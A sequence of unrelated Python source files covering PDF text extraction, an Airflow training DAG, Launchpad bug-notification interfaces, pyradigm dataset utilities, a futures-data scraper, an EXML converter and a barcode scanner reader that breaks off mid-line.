# coding=utf-8 import os import io import sys import logging import shutil try: from cStringIO import StringIO except: from StringIO import StringIO from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter from pdfminer.converter import TextConverter from pdfminer.layout import LAParams from pdfminer.pdfpage import PDFPage from nltk import wordpunct_tokenize from nltk.corpus import stopwords def obtener_rutas(rutaBase, extension='.pdf', blacklist=None): if blacklist is None: return [os.path.join(rutaBase,x) for x in os.listdir(rutaBase) if extension in x] else: return [os.path.join(rutaBase,x) for x in os.listdir(rutaBase) if (extension in x) and (x not in blacklist)] def calcularValoresDeIdioma(contenido): languages_ratios = {} tokens = wordpunct_tokenize(contenido) words = [word.lower() for word in tokens] for language in stopwords.fileids(): stopwords_set = set(stopwords.words(language)) words_set = set(words) common_elements = words_set.intersection(stopwords_set) languages_ratios[language] = len(common_elements) return languages_ratios def detectarIdioma(contenido): valores = calcularValoresDeIdioma(contenido) idioma = max(valores, key=valores.get) return idioma def convertir(rutaVolumen, hojas=None): if not hojas: hojas = set() else: hojas = set(hojas) output = StringIO() manager = PDFResourceManager() converter = TextConverter(manager, output, laparams=LAParams()) interpreter = PDFPageInterpreter(manager, converter) infile = file(rutaVolumen, 'rb') for hoja in PDFPage.get_pages(infile, hojas): interpreter.process_page(hoja) infile.close() converter.close() text = output.getvalue() output.close return text def convertirVolumenes(rutaVolumenes): txt = "" for rutaVolumen in rutaVolumenes: try: txt += convertir(rutaVolumen) except Exception:"ERROR al convertir el volumen "+rutaVolumen) print "ERROR al convertir el volumen "+rutaVolumen return txt def extraerVolumen(inputPDF): print "---------------------------------" print "Convirtiendo "+inputPDF.path rutaVolumenes = obtener_rutas(inputPDF.path, '.pdf') contenido = convertirVolumenes(rutaVolumenes) idioma = detectarIdioma(contenido) return idioma, contenido # Guardar metadatos def guardarMetadatos(book_name,idioma,txt_dir,meta_file): outfile = book_name meta = os.path.join(txt_dir, meta_file) flag = True if os.path.exists(meta): with open(meta, 'r') as f: log = if outfile in log: flag = False if flag: with open(meta, 'a+') as f: f.write(outfile + '\t'+ idioma + '\n') def save_content(target_dir, book_name, content): if not os.path.exists(target_dir): os.makedirs(target_dir) print '--------------------' print 'Creando carpeta ' + target_dir # Guardar contenido book_path = os.path.join(target_dir,book_name+'.txt') with open(book_path, 'w') as f: f.write(content) print book_name + ' --> ' + target_dir def get_extracts(string, min_length=500, percentages=[0.1,0.5,0.9], max_start_offset=10, max_lines=20): str_list = string.split('\n') positions = [int(p*len(str_list)) for p in percentages] extracts = [] for p in positions: s = '' for i in range(p, min(p + max_start_offset, len(str_list)-1), 1): if len(str_list[i]) > 0 and str_list[i][0].isupper(): break p = p + 1 for i in range(p, min(p + max_lines, len(str_list)-1), 1): if len(s) >= min_length: break else: s += '\n' + str_list[i] extracts.append({'start_line':p, 'start_line_perc':round(1.0*p/len(str_list),3), 'text':s}) return extracts
# Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """DAG definition for recserv model training.""" import airflow from airflow import DAG from airflow.contrib.operators.bigquery_operator import BigQueryOperator from airflow.contrib.operators.bigquery_to_gcs import BigQueryToCloudStorageOperator from airflow.hooks.base_hook import BaseHook from airflow.operators.app_engine_admin_plugin import AppEngineVersionOperator from airflow.operators.ml_engine_plugin import MLEngineTrainingOperator import datetime def _get_project_id(): """Get project ID from default GCP connection.""" extras = BaseHook.get_connection('google_cloud_default').extra_dejson key = 'extra__google_cloud_platform__project' if key in extras: project_id = extras[key] else: raise ('Must configure project_id in google_cloud_default ' 'connection from Airflow Console') return project_id PROJECT_ID = _get_project_id() # Data set constants, used in BigQuery tasks. You can change these # to conform to your data. DATASET = 'GA360_test' TABLE_NAME = 'ga_sessions_sample' ARTICLE_CUSTOM_DIMENSION = '10' # GCS bucket names and region, can also be changed. BUCKET = 'gs://recserve_' + PROJECT_ID REGION = 'us-east1' # The code package name comes from the model code in the wals_ml_engine # directory of the solution code base. PACKAGE_URI = BUCKET + '/code/wals_ml_engine-0.1.tar.gz' JOB_DIR = BUCKET + '/jobs' default_args = { 'owner': 'airflow', 'depends_on_past': False, 'start_date': airflow.utils.dates.days_ago(2), 'email': [''], 'email_on_failure': True, 'email_on_retry': False, 'retries': 5, 'retry_delay': datetime.timedelta(minutes=5) } # Default schedule interval using cronjob syntax - can be customized here # or in the Airflow console. schedule_interval = '00 21 * * *' dag = DAG('recommendations_training_v1', default_args=default_args, schedule_interval=schedule_interval) dag.doc_md = __doc__ # # # Task Definition # # # BigQuery training data query bql=''' #legacySql SELECT fullVisitorId as clientId, ArticleID as contentId, (nextTime - hits.time) as timeOnPage, FROM( SELECT fullVisitorId, hits.time, MAX(IF(hits.customDimensions.index={0}, hits.customDimensions.value,NULL)) WITHIN hits AS ArticleID, LEAD(hits.time, 1) OVER (PARTITION BY fullVisitorId, visitNumber ORDER BY hits.time ASC) as nextTime FROM [{1}.{2}.{3}] WHERE hits.type = "PAGE" ) HAVING timeOnPage is not null and contentId is not null; ''' bql = bql.format(ARTICLE_CUSTOM_DIMENSION, PROJECT_ID, DATASET, TABLE_NAME) t1 = BigQueryOperator( task_id='bq_rec_training_data', bql=bql, destination_dataset_table='%s.recommendation_events' % DATASET, write_disposition='WRITE_TRUNCATE', dag=dag) # BigQuery training data export to GCS training_file = BUCKET + '/data/recommendation_events.csv' t2 = BigQueryToCloudStorageOperator( task_id='bq_export_op', source_project_dataset_table='%s.recommendation_events' % DATASET, destination_cloud_storage_uris=[training_file], export_format='CSV', dag=dag ) # ML Engine training job job_id = 'recserve_{0}'.format('%Y%m%d%H%M')) job_dir = BUCKET + '/jobs/' + job_id output_dir = BUCKET training_args = ['--job-dir', job_dir, '--train-file', training_file, '--output-dir', output_dir, '--data-type', 'web_views', '--use-optimized'] t3 = MLEngineTrainingOperator( task_id='ml_engine_training_op', project_id=PROJECT_ID, job_id=job_id, package_uris=[PACKAGE_URI], training_python_module='trainer.task', training_args=training_args, region=REGION, scale_tier='CUSTOM', master_type='complex_model_m_gpu', dag=dag ) # App Engine deploy new version t4 = AppEngineVersionOperator( task_id='app_engine_deploy_version', project_id=PROJECT_ID, service_id='default', region=REGION, service_spec=None, dag=dag ) t2.set_upstream(t1) t3.set_upstream(t2) t4.set_upstream(t3)
# Copyright 2009 Canonical Ltd. This software is licensed under the # GNU Affero General Public License version 3 (see the file LICENSE). """Bug notifications.""" __metaclass__ = type __all__ = [ 'IBugNotification', 'IBugNotificationFilter', 'IBugNotificationRecipient', 'IBugNotificationSet', ] from lazr.restful.fields import Reference from zope.interface import ( Attribute, Interface, ) from zope.schema import ( Bool, Choice, Datetime, TextLine, ) from lp import _ from lp.bugs.enums import BugNotificationStatus from lp.bugs.interfaces.bugsubscriptionfilter import IBugSubscriptionFilter from lp.registry.interfaces.role import IHasOwner from import BugField class IBugNotification(IHasOwner): """A textual representation of bug changes.""" id = Attribute('id') message = Attribute( "The message containing the text representation of the changes" " to the bug.") activity = Attribute( "The bug activity object corresponding to this notification. Will " "be None for older notification objects, and will be None if the " "bugchange object that provides the data for the change returns None " "for getBugActivity.") bug = BugField(title=u"The bug this notification is for.", required=True) is_comment = Bool( title=u"Comment", description=u"Is the message a comment?", required=True) date_emailed = Datetime( title=u"Date emailed", description=u"When was the notification sent? None, if it hasn't" " been sent yet.", required=False) recipients = Attribute( "The people to which this notification should be sent.") status = Choice( title=_("Status"), required=True, vocabulary=BugNotificationStatus, default=BugNotificationStatus.PENDING, description=_( "The status of this bug notification."), ) bug_filters = Attribute( "List of bug filters that caused this notification.") class IBugNotificationSet(Interface): """The set of bug notifications.""" def getNotificationsToSend(): """Returns the notifications pending to be sent.""" def getDeferredNotifications(): """Returns the deferred notifications. A deferred noticiation is one that is pending but has no recipients. """ def addNotification(self, bug, is_comment, message, recipients, activity): """Create a new `BugNotification`. Create a new `BugNotification` object and the corresponding `BugNotificationRecipient` objects. """ def getRecipientFilterData(bug, recipient_to_sources, notifications): """Get non-muted recipients mapped to sources & filter descriptions. :param bug: A bug we are collecting filter data for. :param recipient_to_sources: A dict of people who are to receive the email to the sources (BugNotificationRecipients) that represent the subscriptions that caused the notifications to be sent. :param notifications: the notifications that are being communicated. The dict of recipients may have fewer recipients than were provided if those users muted all of the subscription filters that caused them to be sent. """ class IBugNotificationRecipient(Interface): """A recipient of a bug notification.""" bug_notification = Attribute( "The bug notification this recipient should receive.") person = Attribute( "The person to send the bug notification to.") reason_header = TextLine( title=_('Reason header'), description=_("The value for the " "`X-Launchpad-Message-Rationale` header.")) reason_body = TextLine( title=_('Reason body'), description=_("The reason for this notification.")) class IBugNotificationFilter(Interface): """`BugSubscriptionFilter` that generated a bug notification.""" bug_notification = Reference( IBugNotification, title=_("Bug notification"), required=True, readonly=True) bug_subscription_filter = Reference( IBugSubscriptionFilter, title=_("Bug subscription filter"), required=True, readonly=True)
from collections import Iterable import numpy as np from pyradigm.base import missing_value_indicator from pyradigm import ClassificationDataset, RegressionDataset from pyradigm.pyradigm import MLDataset feat_generator = np.random.randn from pyradigm.base import is_iterable_but_not_str, BaseDataset from warnings import warn def load_dataset(ds_path): """Convenience utility to quickly load any type of pyradigm dataset""" try: ds = ClassificationDataset(dataset_path=ds_path) except: try: ds = RegressionDataset(dataset_path=ds_path) except: try: warn('MLDtaset is deprecated. Switch to the latest pyradigm data ' 'structures such as ClassificationDataset or ' 'RegressionDataset as soon as possible.') ds = MLDataset(filepath=ds_path) except: raise TypeError('Dataset class @ path below not recognized!' ' Must be a valid instance of one of ' 'ClassificationDataset or ' 'RegressionDataset or MLDataset.\n' ' Ignoring {}'.format(ds_path)) return ds def load_arff_dataset(ds_path): """Convenience utility to quickly load ARFF files into pyradigm format""" try: ds = ClassificationDataset.from_arff(ds_path) except: try: ds = RegressionDataset.from_arff(ds_path) except: try: ds = MLDataset(arff_path=ds_path) except: raise TypeError('Error in loading the ARFF dataset @ path below!' ' Ignoring {}'.format(ds_path)) return ds def check_compatibility(datasets, class_type, reqd_num_features=None, ): """ Checks whether the given Dataset instances are compatible i.e. with same set of subjects, each with the same target in all instances. Checks the first dataset in the list against the rest, and returns a boolean array. Parameters ---------- datasets : Iterable A list of n datasets class_type : class Class of the datasets being compared e.g. ClassificationDataset or RegressionDataset or [the deprecated] MLDataset. All datasets being compared must be of the same class type. reqd_num_features : int The required number of features in each dataset. Helpful to ensure test sets are compatible with training set, as well as within themselves. Returns ------- all_are_compatible : bool Boolean flag indicating whether all datasets are compatible or not compatibility : list List indicating whether first dataset is compatible with the rest individually. This could be useful to select a subset of mutually compatible datasets. Length : n-1 dim_mismatch : bool Boolean flag indicating mismatch in dimensionality from that specified size_descriptor : tuple A tuple with values for (num_samplets, reqd_num_features) - num_samplets must be common for all datasets that are evaluated for compatibility - reqd_num_features is None (when no check on dimensionality is perfomed), or list of corresponding dimensionalities for each input dataset """ from collections import Iterable if not is_iterable_but_not_str(datasets): raise TypeError('Input must be an iterable ' 'i.e. (list/tuple) of MLdataset/similar instances') datasets = list(datasets) # to make it indexable if coming from a set num_datasets = len(datasets) check_dimensionality = False dim_mismatch = False if reqd_num_features is not None: if isinstance(reqd_num_features, Iterable): if len(reqd_num_features) != num_datasets: raise ValueError( 'Specify dimensionality for exactly {} datasets.' ' Given for a different number {}' ''.format(num_datasets, len(reqd_num_features))) reqd_num_features = list(map(int, reqd_num_features)) else: # same dimensionality for all reqd_num_features = [int(reqd_num_features)] * num_datasets check_dimensionality = True else: # to enable iteration reqd_num_features = [None, ] * num_datasets pivot = datasets[0] if isinstance(pivot, str): pivot = class_type(dataset_path=pivot) elif not isinstance(pivot, BaseDataset): raise TypeError('All datasets in pyradigm must be subclasses of ' 'BaseDataset') if check_dimensionality and pivot.num_features != reqd_num_features[0]: warn('Dimensionality mismatch! Expected {} whereas current {}.' ''.format(reqd_num_features[0], pivot.num_features)) dim_mismatch = True compatible = list() for ds, reqd_dim in zip(datasets[1:], reqd_num_features[1:]): if isinstance(ds, str): ds = class_type(dataset_path=ds) elif not isinstance(ds, BaseDataset): raise TypeError('All datasets in pyradigm must be subclasses of ' 'BaseDataset') is_compatible = True # compound bool will short-circuit, not optim required if pivot.num_samplets != ds.num_samplets \ or pivot.samplet_ids != ds.samplet_ids \ or pivot.targets != ds.targets: is_compatible = False if check_dimensionality and reqd_dim != ds.num_features: warn('Dimensionality mismatch! ' 'Expected {} whereas current {}.' ''.format(reqd_dim, ds.num_features)) dim_mismatch = True compatible.append(is_compatible) return all(compatible), compatible, dim_mismatch, \ (pivot.num_samplets, reqd_num_features) def attr_generator(attr_type, count): """Generates distributions of a given type""" attr_type = attr_type.lower() if attr_type in ('int', 'age'): return np.random.randint(100, size=count) elif attr_type in ('float', 'weight'): return 100*np.abs(np.random.rand(count)) elif attr_type in ('sex', 'gender'): return np.random.choice(['male', 'female', 'other'], count, replace=True) elif attr_type in ('site', ): return np.random.choice(['site{}'.format(ss) for ss in range(6)], count, replace=True) elif isinstance(attr_type, Iterable): return np.random.choice(attr_type, count, replace=True) else: raise ValueError('Invalid type: must be int or float.' ' Or an array of values to sample from.' ' Type can also be age, sex, gender, weight, or site.') def make_random_dataset(max_num_classes=20, min_class_size=20, max_class_size=50, max_dim=100, stratified=True, with_missing_data=False, class_type=ClassificationDataset, min_num_classes=2, attr_names=None, attr_types=None): "Generates a random Dataset for use in testing." smallest = min(min_class_size, max_class_size) max_class_size = max(min_class_size, max_class_size) largest = max(50, max_class_size) largest = max(smallest + 3, largest) if min_num_classes < 2: min_num_classes = 2 if max_num_classes <= min_num_classes: max_num_classes = min_num_classes num_classes = np.random.randint(min_num_classes, max_num_classes, 1) if type(num_classes) == np.ndarray: num_classes = num_classes[0] if not stratified: class_sizes = np.random.randint(smallest, largest+1, num_classes) else: class_sizes = np.repeat(np.random.randint(smallest, largest), num_classes) num_samplets = class_sizes.sum() num_features = np.random.randint(min(3, max_dim), max(3, max_dim), 1)[0] # feat_names = [ str(x) for x in range(num_features)] class_ids = list() labels = list() for cl in range(num_classes): if issubclass(class_type, RegressionDataset): class_ids.append(cl) else: class_ids.append('class-{}'.format(cl)) labels.append(int(cl)) # attributes if attr_names is not None: if len(attr_names) != len(attr_types): raise ValueError('Differing number of names and types for attributes!') attrs = dict() for name, typ in zip(attr_names, attr_types): attrs[name] = attr_generator(typ, num_samplets) ds = class_type() s_index = 0 for cc, class_ in enumerate(class_ids): subids = ['s{}-c{}'.format(ix, cc) for ix in range(class_sizes[cc])] for sid in subids: features = feat_generator(num_features) if with_missing_data: rand_loc = np.random.randint(num_features) features[rand_loc] = missing_value_indicator if isinstance(ds, MLDataset): ds.add_sample(sid, features, int(cc), class_) else: if attr_names is not None: a_values = [ attrs[a_name][s_index] for a_name in attr_names] ds.add_samplet(sid, features, class_, attr_names=attr_names, attr_values=a_values) else: ds.add_samplet(sid, features, class_) s_index += 1 return ds def make_random_ClfDataset(max_num_classes=20, min_class_size=20, max_class_size=50, max_dim=100, stratified=True, min_num_classes=2, attr_names=None, attr_types=None ): "Generates a random ClassificationDataset for use in testing." return make_random_dataset(max_num_classes=max_num_classes, min_class_size=min_class_size, max_class_size=max_class_size, max_dim=max_dim, stratified=stratified, class_type=ClassificationDataset, min_num_classes=min_num_classes, attr_names=attr_names, attr_types=attr_types) def make_random_RegrDataset(min_size=20, max_size=50, max_dim=100, with_missing_data=False, attr_names=None, attr_types=None ): "Generates a random ClassificationDataset for use in testing." smallest = min(min_size, max_size) max_size = max(min_size, max_size) largest = max(50, max_size) largest = max(smallest + 3, largest) sample_size = np.random.randint(smallest, largest+1) num_features = np.random.randint(min(3, max_dim), max(3, max_dim), 1)[0] # attributes if attr_names is not None: if len(attr_names) != len(attr_types): raise ValueError('Differing number of names and types for attributes!') attrs = dict() for name, typ in zip(attr_names, attr_types): attrs[name] = attr_generator(typ, sample_size) ds = RegressionDataset() subids = ['s{}'.format(ix) for ix in range(sample_size)] for counter, sid in enumerate(subids): features = feat_generator(num_features) target = np.random.randint(sample_size) if with_missing_data: rand_loc = np.random.randint(num_features) features[rand_loc] = missing_value_indicator if attr_names is not None: a_values = [attrs[a_name][counter] for a_name in attr_names] ds.add_samplet(sid, features, target, attr_names=attr_names, attr_values=a_values) else: ds.add_samplet(sid, features, target) return ds def make_random_MLdataset(max_num_classes=20, min_class_size=20, max_class_size=50, max_dim=100, stratified=True): "Generates a random MLDataset for use in testing." return make_random_dataset(max_num_classes=max_num_classes, min_class_size=min_class_size, max_class_size=max_class_size, max_dim=max_dim, stratified=stratified, class_type=MLDataset) def dataset_with_new_features_same_everything_else(in_ds, max_feat_dim): """Helper utility for MultiDataset purposes.""" feat_dim = np.random.randint(1, max_feat_dim) out_ds = in_ds.__class__() for id_ in in_ds.samplet_ids: out_ds.add_samplet(id_, np.random.rand(feat_dim), target=in_ds.targets[id_]) # copying attr out_ds.attr = in_ds.attr out_ds.dataset_attr = in_ds.dataset_attr out_ds.attr_dtype = in_ds.attr_dtype return out_ds
#!/usr/bin/python # -*- coding: utf-8 -*- #encoding=utf-8 # pip install BeautifulSoup MySQL-python # from 20100416 import sys,re,urllib2,urllib,cookielib,chardet,time from BeautifulSoup import BeautifulSoup,Comment from datetime import * import time,logging,MySQLdb import re import xml.dom.minidom import dbconf reload(sys) sys.setdefaultencoding('utf8') logging.basicConfig(filename='futures.log',format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG) # console = logging.StreamHandler(); # console.setLevel(logging.INFO); # # set a format which is simpler for console use # formatter = logging.Formatter('LINE %(lineno)-4d : %(levelname)-8s %(message)s'); # # tell the handler to use this format # console.setFormatter(formatter); # logging.getLogger('').addHandler(console); # 中金最少放在1,然后是郑州,2,然后是上海3,然后是大连4 query1 = "insert into tr(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)" query2 = "insert into lp(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)" query3 = "insert into sp(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)" url_date = "20130918""argv count:%s" % len(sys.argv)) if len(sys.argv)>1: if sys.argv[1]!=None: url_date = sys.argv[1] else:"未输入日期,则默认处理当前数据!") now = url_date = now.strftime('%Y%m%d')"处理日期 url_date: %s",url_date) '''obtain futures data''' url_one = "" % (url_date[0:6],url_date[6:8]) try: f = None req = urllib2.Request(url=url_one) req.add_header('Context-Type', 'application/xml') f = urllib2.urlopen(req) rawdata = if f.geturl().find('error_404') > 0 : logging.error("此日期无信息!URL:%s" % url_date) exit(0) except Exception,e: logging.error("下载此页信息失败!URL:%s" % url_one) logging.error(e) exit(1) finally: if f!=None: f.close() # f2=open('data_cffex_20130918.xml','w') # f2.write(rawdata) # f2.close() # f3= open('data_cffex_20130918.xml','r') # rawdata = # f3.close() #delete already get data conn = None cursor = None try: conn = MySQLdb.Connection(, dbconf.user, dbconf.password, dbconf.dbname,charset='utf8') cursor = conn.cursor() delete_sql = "delete from lp where og='%s' and dt=%s;\ delete from sp where og='%s' and dt=%s;\ delete from tr where og='%s' and dt=%s;" check_sql = "select count(*) from lp where og='%s' and dt=%s;" cursor.execute(check_sql % (1,url_date))"already get data count need delete: %s" % cursor.fetchall()[0][0]) cursor.execute(delete_sql % (1,url_date,1,url_date,1,url_date)) % ('中金',url_date,'中金',url_date,'中金',url_date)) except Exception,e: logging.error(" MySQL server exception!!!") logging.error(e) sys.exit(1) finally: if cursor!= None: cursor.close() if conn!= None: conn.commit() conn.close() ishasdata = False"处理URL为:%s" % url_one) # rawdata = rawdata.replace('encoding="GBK"','encoding="utf-8"') rawdata = unicode(rawdata,encoding='gbk').encode('utf-8') dom = xml.dom.minidom.parseString(rawdata) def getText(nodelist): rc = [] for node in nodelist: if node.nodeType == node.TEXT_NODE: rc.append( return ''.join(rc) data_c = 0 for e in dom.getElementsByTagName("data"): data_c+=1 "find data count = %s" % data_c) if data_c > 3: ishasdata = True"obtain data success,start process") else: logging.warning("此页未找到足够数据!obtain data failed date: %s" % url_one) exit(0) for index,e in enumerate(dom.getElementsByTagName("data")): shortname = e.getElementsByTagName('shortname') instrument = e.getElementsByTagName('instrumentId') dataType = e.getElementsByTagName('dataTypeId') # 0chengjiao 1买danliang 2maidanliang value = e.getElementsByTagName('volume') instrument = getText(instrument[0].childNodes).strip() shortname = getText(shortname[0].childNodes).strip() dataType = getText(dataType[0].childNodes).strip() value = getText(value[0].childNodes).strip() try: conn = None cursor = None conn = MySQLdb.Connection(, dbconf.user, dbconf.password, dbconf.dbname,charset='utf8') cursor = conn.cursor() if dataType == '0': % (1,instrument,shortname,value,url_date)) cursor.execute(query1,('1',instrument,shortname,value,url_date)) if dataType == '1': % (1,instrument,shortname,value,url_date)) cursor.execute(query2,('1',instrument,shortname,value,url_date)) if dataType == '2': % (1,instrument,shortname,value,url_date)) cursor.execute(query3,('1',instrument,shortname,value,url_date)) except Exception,e: logging.error(" MySQL server exception!!!") logging.error(e) sys.exit(1) finally: if cursor!= None: cursor.close() if conn!= None: conn.commit() conn.close() time.sleep(1) from smtpmail import send_mail send_mail([""],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date)) send_mail([""],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date)) send_mail([""],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date)) send_mail(["dangwannian@triumphantbank"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
from __future__ import print_function import optparse import xml.etree.cElementTree as etree from exmldoc import make_syntax_doc, process_schema, fill_attributes def exml_lint_main(argv=None): """ Reads an EXML file and writes it back in normal form, allowing a conversion between ExportXML and EXML-JSON This file also demonstrates the use of exmldoc to stream a larger document """ encoding = 'UTF-8' oparse = optparse.OptionParser() opts, args = oparse.parse_args(argv) ctx = etree.iterparse(args[0], events=('start', 'end')) doc = make_syntax_doc() f_out = open(args[1], 'wb') state = 'BEFORE_HEAD' markable_stack = [] cur_pos = 0 last_stop = 0 in_word = False for evt, elem in ctx: if state == 'BEFORE_HEAD' and evt == 'end' and elem.tag == 'schema': process_schema(doc, elem) print('<?xml version="1.0" encoding="%s"?>' % (encoding,), file=f_out) print('<exml-doc>', file=f_out) doc.describe_schema(f_out, encoding=encoding) state = 'BEFORE_BODY' elif state == 'BEFORE_BODY' and evt == 'start' and elem.tag == 'body': state = 'IN_BODY' print('<body serialization="inline">', file=f_out) elif state == 'IN_BODY': if evt == 'end' and elem.tag == 'body': # TODO wrap up all loose ends pass elif evt == 'start': # create markable # TODO if a markable or word does not have an XML-id, # assign one by default if elem.tag == 'word': schema = doc.t_schema obj = schema.create_from_xml(elem, doc, encoding) obj.span = [cur_pos, None] doc.add_terminal(obj) doc.object_by_id[obj.xml_id] = obj in_word = True else: # set start point try: schema = doc.schema_by_name(elem.tag) except KeyError: # assume it's an edge; we'll deal with it later if in_word: (schema, obj) = (doc.t_schema, doc.words[-1]) elif markable_stack: (schema, obj) = markable_stack[-1] else: schema = obj = None try: edge_schema = schema.edge_by_name(elem.tag) except KeyError: edge_schema = None if edge_schema is not None: pass else: print("No schema:", elem.tag, [ for s in doc.schemas]) else: obj = schema.create_from_xml(elem, doc, encoding) obj.span = [cur_pos, None] markable_stack.append((schema, obj)) elif evt == 'end': # print elem.tag, markable_stack if elem.tag == 'word': in_word = False cur_pos += 1 elif elem.tag == 'body': fill_attributes(elem, doc, encoding) elem.clear() # write out part of the document doc.write_inline_xml(f_out, last_stop, cur_pos) doc.clear_markables(last_stop, cur_pos) last_stop = cur_pos state = 'AFTER_BODY' elif markable_stack and elem.tag == markable_stack[-1][0].name: # set end point of markable (schema, obj) = markable_stack.pop() obj.span[1] = cur_pos doc.register_object(obj, schema) if elem.tag == 'text': # if it's a text markable, fill attributes and empty out # the element fill_attributes(elem, doc, encoding) elem.clear() # write out part of the document doc.write_inline_xml(f_out, last_stop, cur_pos) doc.clear_markables(last_stop, cur_pos) last_stop = cur_pos print('</body>', file=f_out) print('</exml-doc>', file=f_out) if __name__ == '__main__': exml_lint_main()
import sys from PyQt5.QtCore import * from PyQt5.QtGui import * from PyQt5.QtWidgets import * from Util.exception import * from Util import constants from datetime import date, datetime if sys.platform.startswith("linux"): from evdev import * from evdev.ecodes import * import re keycodeToASCII = { KEY_1: ['1', '!'], KEY_2: ['2', '@'], KEY_3: ['3', '#'], KEY_4: ['4', '$'], KEY_5: ['5', '%'], KEY_6: ['6', '^'], KEY_7: ['7', '*'], KEY_8: ['8', '('], KEY_9: ['9', '('], KEY_0: ['0', ')'], KEY_MINUS: ['-', '_'], KEY_EQUAL: ['=', '+'], KEY_TAB: ['\t', '\t'], KEY_Q: ['q', 'Q'], KEY_W: ['w', 'W'], KEY_E: ['e', 'E'], KEY_R: ['r', 'R'], KEY_T: ['t', 'T'], KEY_Y: ['y', 'Y'], KEY_U: ['u', 'U'], KEY_I: ['i', 'I'], KEY_O: ['o', 'O'], KEY_P: ['p', 'P'], KEY_LEFTBRACE: ['[', '{'], KEY_RIGHTBRACE: [']', '}'], KEY_ENTER: ['\r\n', '\r\n'], KEY_A: ['a', 'A'], KEY_S: ['s', 'S'], KEY_D: ['d', 'D'], KEY_F: ['f', 'F'], KEY_G: ['g', 'G'], KEY_H: ['h', 'H'], KEY_J: ['j', 'J'], KEY_K: ['k', 'K'], KEY_L: ['l', 'L'], KEY_SEMICOLON: [';', ':'], KEY_APOSTROPHE: ['\'', '\"'], KEY_GRAVE: ['`', '~'], KEY_BACKSLASH: ['\\', '|'], KEY_Z: ['z', 'Z'], KEY_X: ['x', 'X'], KEY_C: ['c', 'C'], KEY_V: ['v', 'V'], KEY_B: ['b', 'B'], KEY_N: ['n', 'N'], KEY_M: ['m', 'M'], KEY_COMMA: [',', '<'], KEY_DOT: ['.', '>'], KEY_SLASH: ['/', '?'], KEY_SPACE: [' ', ' '] } numpadcodeToASCII = { KEY_KPASTERISK: '*', KEY_KP7: '7', KEY_KP8: '8', KEY_KP9: '9', KEY_KPMINUS: '-', KEY_KP4: '4', KEY_KP5: '5', KEY_KP6: '6', KEY_KPPLUS: '+', KEY_KP1: '1', KEY_KP2: '2', KEY_KP3: '3', KEY_KP0: '0', KEY_KPDOT: '.', KEY_KPSLASH: '/' } class BarcodeScanner(QObject): # Signal is emitted once a barcode has been scanned and received barcodeReceived = pyqtSignal(str) def __init__(self, parent, usbPortNumber, shortcut=None, scannerTitle=None): QObject.__init__(self, parent) self.parent = parent self.modifiers = { KEY_RIGHTMETA: 0, # Right GUI - (usually the Windows key) KEY_RIGHTALT: 0, # Right ALT KEY_RIGHTSHIFT: 0, # Right Shift KEY_RIGHTCTRL: 0, # Right Control KEY_LEFTMETA: 0, # Left GUI - (again, usually the Windows key) KEY_LEFTALT: 0, # Left ALT KEY_LEFTSHIFT: 0, # Left Shift KEY_LEFTCTRL: 0 # Left Control } self.state = { KEY_CAPSLOCK: 0, # Caps Lock KEY_NUMLOCK: 0, # Num Lock KEY_SCROLLLOCK: 0, # Scroll Lock } # Setup the device by calling setPort with the desired port number self.usbPortNumber = None self.device = None self.setPort(usbPortNumber) # Set the current string buffer to none self.curStr = "" # Set the current string buffer to none if shortcut is not None: self.shortcut = QShortcut(shortcut, self.parent) self.shortcut.activated.connect(self.shortcut_activated) if scannerTitle: self.shortcutMessage = "Enter %s barcode: " % scannerTitle else: self.shortcutMessage = "Enter barcode: " def setPort(self, usbPortNumber): # Do nothing if the given port is the same as the current port if self.usbPortNumber == usbPortNumber: return if constants.barcodeScannerDeviceEnable: # If this scanner already has a device, ungrab it since were done with it if self.device: self.device.ungrab() # This regex expression identifies a device on a specified USB port number # I am not entirely sure if this is Raspbian specific, Linux specific or what, # but it works in this case rePhysicalLoc = re.compile("usb\-.*\..*\-1\.%i.*" % usbPortNumber) # Loop through all available devices and search for a regex match # First match found is the device we will use devices = [InputDevice(fn) for fn in list_devices()] self.device = None for device in devices: if rePhysicalLoc.match(device.phys) is not None: self.device = device break # If unable to find the device at port number, raise error if self.device is None: raise SmartShopException("Unable to find input device located at port %i" % usbPortNumber) # Grab current device so that no one else can receive input events from it self.device.grab() # Get the current state of the LED buttons; update self.state with the values that are on ledStates = self.device.leds() if LED_CAPSL in ledStates: self.state[KEY_CAPSLOCK] = 1 if LED_NUML in ledStates: self.state[KEY_NUMLOCK] = 1 if LED_SCROLLL in ledStates: self.state[KEY_SCROLLLOCK] = 1 # Set current port number to the given port number self.usbPortNumber = usbPortNumber def poll(self): try: if constants.barcodeScannerDeviceEnable: # Read all of the events from the loop deviceEvents = for event in deviceEvents: # Only accept keyboard events if event.type is EV_KEY: keyEvent = util.categorize(event) if keyEvent.scancode in self.modifiers: if keyEvent.keystate is events.KeyEvent.key_down: self.modifiers[keyEvent.scancode] = 1 elif keyEvent.keystate is events.KeyEvent.key_up: self.modifiers[keyEvent.scancode] = 0 elif keyEvent.scancode in self.state: if keyEvent.keystate is events.KeyEvent.key_down: self.state[keyEvent.scancode] = 1 elif keyEvent.keystate is events.KeyEvent.key_up: self.state[keyEvent.scancode] = 0 elif keyEvent.keystate is events.KeyEvent.key_down or keyEvent.keystate is events.KeyEvent.key_hold: if keyEvent.scancode is KEY_ENTER: # Clear the curStr variable because recursion may occur where a barcode scan happens # inside the barcodeReceived signal emitStr = self.curStr self.curStr = "" self.barcodeReceived.emit(emitStr) elif keyEvent.scancode in keycodeToASCII: shift = (self.modifiers[KEY_LEFTSHIFT] or self.modifiers[KEY_RIGHTSHIFT]) self.curStr += keycodeToASCII[keyEvent.scancode][shift] elif keyEvent.scancode in numpadcodeToASCII and 